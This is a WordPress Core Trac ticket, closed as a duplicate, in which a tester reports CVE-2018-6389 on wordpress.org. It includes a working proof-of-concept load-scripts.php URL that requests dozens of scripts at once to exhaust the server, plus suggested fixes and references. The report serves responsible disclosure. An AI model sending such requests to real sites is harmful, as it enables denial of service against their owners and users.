Make WordPress Core

Opened 5 years ago

Closed 5 years ago

#44943 closed defect (bug) (duplicate)

Using component with Known Vulnerability - Unpatched WordPress leading to DoS

Reported by: frontdoorpentest's profile frontdoorpentest Owned by:
Milestone: Priority: normal
Severity: normal Version:
Component: Script Loader Keywords:
Focuses: Cc:

Description

I would like to report a vulnerability that is categorized under "A9:2017-Using Components with Known Vulnerabilities" and can lead to denial of service.
Please read the report , before marking as not valid because of DoS ( Note:- there has been no attempt made to DoS the freshbooks web application )

Vulnerability:- https://wordpress.org/ uses word press as a backend engine to run its web application and using CVE-2018-6389 an anonymous user can cause Denial of service. In this vulnerability an attacker will pass all the possible javascript library and the application tries to load all the functions and send it back in response. Passing a large list of js functions can consume lot processing to responed back and if done from various location/ips/browser tabs can lead to DoS. This attack can lead to generate upto 3mb size response per request.

Url :- https://wordpress.org/wp-admin/load-scripts.php?load=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer

Possible fixes:-

  1. change default "admin" directory name (Security through obscurity)
  2. or apply some password protection to /wp-admin/ url

Impact:-

DoS of the site and application server

Please find the attached screenshot demonstrating the PoC.

Reference:-
https://hackerone.com/reports/335177
https://baraktawily.blogspot.com/2018/02/how-to-dos-29-of-world-wide-websites.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389

Note: - My intention was never to hamper this platform in any manner just wanted to report in a responsible way.
Attachments area

Attachments (1)

1.JPG (391.7 KB) - added by frontdoorpentest 5 years ago.
screeshot of loaded js functions

Download all attachments as: .zip

Change History (2)

@frontdoorpentest
5 years ago

screeshot of loaded js functions

#1 @ocean90
5 years ago

  • Component changed from General to Script Loader
  • Milestone Awaiting Review deleted
  • Resolution set to duplicate
  • Status changed from new to closed
Note: See TracTickets for help on using tickets.